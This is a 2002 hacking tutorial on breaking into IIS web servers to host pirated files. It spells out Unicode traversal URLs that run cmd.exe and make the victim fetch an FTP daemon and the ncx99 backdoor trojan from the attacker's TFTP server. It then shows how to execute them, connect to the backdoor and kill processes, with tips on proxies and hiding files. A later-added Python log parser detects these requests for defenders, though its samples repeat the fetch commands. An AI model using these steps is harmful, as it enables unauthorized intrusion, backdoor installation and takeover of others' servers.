
The How-To Hack IIS Servers For Pubstros

Tutorial about Hacking using IIS exploits


This one goes out to the people who ask for a tut to start hacking.
If u wanna know more, research it yourself.
Pub Hacking Tutorial
The How-To Hack IIS Servers For Pubstros
(By GENERAL NEWBIE)
March 20, 2002
################ For Educational Use Only ################
Getting started is simple... let me warn you that what you're doing is illegal and dangerous. Now then:
This tutorial tells you how to hack IIS servers and make them as a pub... and how to rehack someone else's pub hahahahaha!
Now then, the tools and knowledge you will need are as follows.
Tools Required:
1. Serv-U FTP Server 4.0 works just fine, but version 3.0 doesn't require an additional dll file
2. TFTPSuitePro2000 (h**p://www.walusoft.co.uk/software/tftppro.exe)
3. Your Brain with knowledge of the IIS Unicode Exploit or MSDAC Exploit
4. Internet Explorer
5. Other things to try
OK, let me start by saying this is for educational purposes only and I take no responsibility for what you do.
The Setup
Step 1: Install Serv-U AND download the already preconfigured ServUDaemon from me (recommended, as I will be explaining from this).
The reason why I told you to download both is that the Serv-U version 4 you download has an admin program, so you can make your own ini file after you understand everything I have in mine.
Step 2: Install TFTPSuite (during installation pick SERVER).
TFTPSuitePro Setup: Open TFTPSuitePro. When it asks you to register, hit Register, then Cancel. You should have something that looks like this. Hit System->Setup; for Inbound Path File, hit Browse and pick the C:\FTP dir we made, and do the same for Outbound, then hit OK. Now then, when it's time to upload files, the TFTP SERVER MUST BE RUNNING.
Step 3: Unzip the Zip/Rar, where you will find some goodies to help you scan for IIS servers and find one to hack.
Here you will find tons of little programs that will assist you in hacking your server.
Step 4: FIND A VULNERABLE SERVER
Step 5: Start Making the Pub
OK, I'm assuming you have a host that you can maybe get away with uploading files to... and I say this because some networks are behind firewalls that don't allow TFTP to connect to an outside host and establish a connection. Thus, even though you can use the unicode exploit on it to view all the files, that still doesn't mean you can upload files to it.
Plus, some host administrators make it so that you can't write to the HD... GOOD LUCK THERE
Starting To THE HACK
FIRST BEFORE YOU DO THIS BE SURE TO USE A PROXY !!!!!!!!!!!!!!!!
The Right Side, you should be at a directory listing in Internet Explorer. The dir should look like this:
h**p://xxx.xxx.xxx.xx/scripts/..%%3...32/cmd.exe?/c+dir+c:\ <----- This line will vary
Directory of c:\
07/17/02 12:17a 1,000,000 ---=1Mb=---
05/03/02 08:57a 0 AUTOEXEC.BAT
05/03/02 08:54a 0 AUTOEXEC.CAM
06/01/01 09:09a 0 CONFIG.SYS
12/26/01 12:46p <DIR> Desktop
06/01/01 02:20p <DIR> I386
07/08/02 02:52p <DIR> intepub
06/01/01 02:49p <DIR> NIC
12/23/01 08:32p <DIR> NIMDA TO
12/23/01 08:32p <DIR> Nimda Tool
07/17/02 05:56p 65,634,304 pagefile.sys
01/04/02 04:31p <DIR> Program Files
07/17/02 12:14a <DIR> TEMP
06/05/01 05:01p <DIR> temptape
06/01/01 04:53p <DIR> Video
12/23/01 09:53p <DIR> Windows Update Setup Files
07/17/02 05:50p <DIR> WINNT
19 File 72,687,972 bytes
480,750,592 bytes free
OK, you get the idea of what your browser looks like because you're experienced, but you are clueless about this pub crap.
Now then, you will need to start and run the TFTP SERVER, making sure you aren't running a firewall because it will block your request. Now we will need to send the files through the TFTP server to the host. And to do this you do something like:
h**p://xxx.xxx.xxx.xx/scripts/..%%3...32/cmd.exe?/c+c:\winnt\system32\tftp.exe+"-i"+YourIPHere+get+ServUDaemon.exe+c:\WINNT\ServUDaemon.exe
Now then, you aren't limited to just 1 dir to install this server to. I like to hide mine in c:\winnt\system, but some people use c:\inetpub\scripts.
h**p://xxx.xxx.xxx.xx/scripts/..%%3...32/cmd.exe?/c+c:\winnt\system32\tftp.exe+"-i"+YourIPHere+get+ServUDaemon.exe+c:\WINNT\ServUDaemon.exe
So then you would copy the above line into Internet Explorer and hit Enter. Look at your TFTPSuitePro window and you should see it's uploading a file. NOTE: SOMETIMES you get an error msg; just refresh the page or copy it into another window and try again. Remember, sometimes you get this msg because the host can't connect properly to you.
Repeat for the following files:
SFIND.exe -------> used to scan for more servers
KILL.EXE -------> used to kill a task, very handy
TLIST.EXE -------> used to list all running processes (Task List)
ncx99.exe -------> used as a backdoor remote trojan that runs on port 99
iis-scanner.EXE -------> great for scanning servers
servudaemon.ini -------> needed for servu
HOW THE UPLOAD FILES SHOULD LOOK (gave 2 examples)
h**p://www.target.com/scripts/..%25...md.exe?/c+tftp+-i+%20**.***.**.**+GET+ServUDaemon.ini+c:\winnt\system\ServUDaemon.ini
h**p://www.target.com/scripts/..%25...md.exe?/c+tftp+-i+%20**.***.**.**+GET+ServUDaemon.exe+c:\winnt\system\ServUDaemon.exe
h**p://www.target.com/scripts/..%25...md.exe?/c+tftp+-i+%20**.***.**.**+GET+ServUDaemon.ini+c:\inetpub\scripts\ServUDaemon.ini
h**p://www.target.com/scripts/..%25...md.exe?/c+tftp+-i+%20**.***.**.**+GET+ServUDaemon.ini+c:\inetpub\scripts\ServUDaemon.exe
h**p://www.target.com/scripts/..%25...md.exe?/c+tftp+-i+%20**.***.**.**+GET+TzoLibr.dll+c:\winnt\system\TzoLibr.dll
h**p://www.target.com/scripts/..%25...md.exe?/c+tftp+-i+%20**.***.**.**+GET+ncx99.exe+c:\winnt\system\ncx99.exe
h**p://www.target.com/scripts/..%25...md.exe?/c+tftp+-i+%20**.***.**.**+GET+bnc.cfg+c:\winnt\system\tlist.exe
EXECUTE PROGRAMS
h**p://www.target.com/scripts/..%25...md.exe?/c+call+c:\winnt\system\ncx99.exe
h**p://www.target.com/scripts/..%25...md.exe?/c+start+c:\winnt\system\ncx99.exe
h**p://www.target.com/scripts/..%25...md.exe?/c+c:\ncx99.exe%20/h
After the file has been executed, the FTP should be up!
Test it with the server IP/Port/L/p you set up back in the Serv-U FTP settings.
If it works, you now have complete control over the system!
Now then, here is where Serv-U 4.0 comes in: you may now use the admin program that comes with it so that you can set up your server the way you want. You have admin rights.
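Seen from the defender's side, every request shown above leaves a line in the web server's access log. The added example below (not part of the original tutorial) parses such lines and reports which commands ran through cmd.exe, where tftp pulled files from and where they were written. The 7-field log layout, the sample lines and the name `analyze` are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample in an assumed 7-field layout:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
# "[elided]" stands for the traversal sequence the page abbreviates;
# addresses come from documentation ranges.
SAMPLE_LOG = """\
2002-07-17 00:12:01 198.51.100.7 GET /default.htm - 200
2002-07-17 00:14:09 203.0.113.9 GET /scripts/[elided]/winnt/system32/cmd.exe /c+dir+c:\\ 200
2002-07-17 00:14:40 203.0.113.9 GET /scripts/[elided]/winnt/system32/cmd.exe /c+tftp+-i+%20203.0.113.50+GET+ncx99.exe+c:\\winnt\\system\\ncx99.exe 502
2002-07-17 00:15:02 203.0.113.9 GET /scripts/[elided]/winnt/system32/cmd.exe /c+start+c:\\winnt\\system\\ncx99.exe 502
"""

SHELL_STEM = re.compile(r"[\\/]cmd\.exe$", re.I)         # interpreter reached via a web path
TFTP_BIN = re.compile(r"^(?:\S*[\\/])?tftp(?:\.exe)?$", re.I)

def analyze(log_text):
    """Return one finding per request that ran cmd.exe through the web server."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split()
        if line.startswith("#") or len(parts) != 7:
            continue                                      # W3C header or malformed line
        date, clock, client, _method, stem, query, status = parts
        if not SHELL_STEM.search(unquote(stem)):
            continue
        # '+' and %20 both separate arguments; quotes around switches are noise.
        argv = unquote(query.replace("+", " ")).replace('"', "").split()
        if argv and argv[0].lower() == "/c":
            argv = argv[1:]
        hit = {"time": f"{date} {clock}", "client": client, "status": status,
               "action": "command", "command": " ".join(argv)}
        if argv and TFTP_BIN.match(argv[0]):
            rest = [a for a in argv[1:] if a.lower() != "-i"]
            # tftp [-i] host GET source [destination]
            if len(rest) >= 3 and rest[1].lower() == "get":
                hit.update(action="tftp_download", remote_host=rest[0],
                           file=rest[2], dropped_to=rest[3] if len(rest) > 3 else rest[2])
        elif len(argv) > 1 and argv[0].lower() in ("start", "call"):
            hit.update(action="execute", program=argv[1])
        findings.append(hit)
    return findings

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

The `remote_host` and `dropped_to` values give an incident responder the address to block and the file paths to collect from the host.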
Other Shit How To Use 'Kill' And 'Tlist' and 'ncx99.exe'
Tlist = Lists All Running Programs On Remote Machine
Kill = Kills Ones U Specify
ncx99.exe = Dos like trojan
How to use ncx99
C:\>telnet host 99
Then, once you connect to your server, you will see a DOS-like environment, so find where you uploaded tlist.exe and execute it:
c:\> cd winnt
c:\>winnt\ cd system
c:\>winnt\system\tlist.exe
Tlist is good when you have ncx99.exe installed, so it's easier to just call it up:
c:\>winnt\system\tlist.exe
-2 Idle.exe
4 System.exe
840 smss.exe
948 csrss.exe
972 winlogon.exe NetDDE Agent
1016 services.exe
1028 lsass.exe
1216 svchost.exe
1364 svchost.exe
1500 svchost.exe
1636 svchost.exe
1820 spoolsv.exe
1952 CTSVCCDA.exe
1988 mdm.exe
2024 DUC20.exe Duc20
408 MsPMSPSv.exe
3024 svchost.exe
360 explorer.exe Program Manager
3496 ctfmon.exe CiceroUIWndFrame
3068 WinCinemaMgr.exe InterVideo WinCinema Manager
1124 evntsvc.exe Notification Wnd for RNAdmin
1568 msmsgs.exe DDE Server Window
2664 iis-scanner.exe Notification Window
2172 r_server.exe
3712 daemon.exe
2800 cmd.exe Command Prompt
3880 TLIST.exe
-2 _Total.exe
Now then, to kill it there are two ways. I will show you the first from within ncx99.exe because it's best: just look at the tlist.exe list and find the system process you want to kill. Now, from the same dir that you installed kill in, run kill; for me it would be
c:\>winnt\system\kill.exe
Now then, let's say I wanted to close explorer.exe. I look at the tlist and see '360 explorer.exe Program Manager'. 360 is the process id that you will use to close down explorer.exe, so you call it like this:
c:\>winnt\system\kill.exe 360
Do another tlist.exe and you will no longer see explorer.exe there.
The other way to do this is to use the URL
h**p://www.target.com/scripts/..%25...md.exe?/c+start+c:\winnt\system\kill.exe?number
where number is again from the tlist.exe. So to kill explorer.exe we do something like this:
h**p://www.target.com/scripts/..%25...md.exe?/c+start+c:\winnt\system\kill.exe?360
and it should say killed.
